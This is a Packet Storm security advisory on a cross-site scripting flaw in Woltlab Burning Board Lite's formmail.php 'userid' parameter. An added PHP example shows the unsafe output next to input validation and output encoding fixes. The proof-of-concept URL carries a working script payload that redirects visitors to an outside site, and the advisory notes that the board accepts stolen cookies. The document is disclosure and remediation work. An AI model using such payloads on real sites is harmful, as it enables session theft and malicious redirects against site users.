Type packetstorm
Reporter Martin Heistermann
Modified 2005-01-11T00:00:00


Advisory Information  
Advisory name : Woltlab Burning Board Lite formmail.php XSS  
Discovered by : drhankey / it-security23.net  
Vendor Name : Woltlab  
Vendor Homepage : http://www.woltlab.de  
Software : Woltlab Burning Board Lite  
Vulnerability Type : Cross-Site-Scripting  
Vulnerable Versions : 1.0.0, 1.0.1e, maybe more  
Platforms : OS Independent, PHP  
What is Woltlab Burning Board Lite?  
Woltlab Burning Board Lite is the free version of the Woltlab Burning Board,  
a PHP-based bulletin board.  
Vulnerability Description:  
formmail.php outputs the "userid" parameter unfiltered, so it is possible to add arbitrary code to the output by using a malformed link.  
The Board also allows logging in with stolen cookies.  
Proof of Concept:  
http://website/board/formmail.php?userid=1"><script>document.location.href="http://www.it-security23.net";</script x="y
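
The unfiltered output described above, next to two ways of closing it, as an added example that is not part of the original advisory and is not Woltlab's code. It assumes the parameter is written into an HTML attribute value; the function names and sample inputs are constructed for illustration.

```php
<?php
// Added illustration, not Woltlab source. All function names are hypothetical.
// Assumption: userid is echoed into an HTML attribute value.

// Pattern the advisory describes: the raw parameter is concatenated into
// the page, so a '"' in the value ends the attribute early.
function render_field_unsafe(string $userid): string
{
    return '<input type="hidden" name="userid" value="' . $userid . '">';
}

// Fix 1: userid is a numeric key, so accept only a positive integer.
function parse_userid(string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Fix 2: encode at the point of output, whatever the origin of the value.
function render_field_safe(string $userid): string
{
    $escaped = htmlspecialchars($userid, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="userid" value="' . $escaped . '">';
}

// Constructed sample inputs: a normal id and a quote-breaking value
// carrying inert markup.
$samples = ['1', '1"><b>injected</b>'];

foreach ($samples as $raw) {
    $id = parse_userid($raw);
    echo 'input:     ', $raw, PHP_EOL;
    echo 'validated: ', $id === null ? 'rejected' : (string) $id, PHP_EOL;
    echo 'unsafe:    ', render_field_unsafe($raw), PHP_EOL;
    echo 'safe:      ', render_field_safe($raw), PHP_EOL, PHP_EOL;
}
```

For the second sample the unsafe output contains a live `<b>` element outside the attribute, while validation rejects the value and the encoded output keeps it inside the attribute as `&quot;&gt;&lt;b&gt;...`.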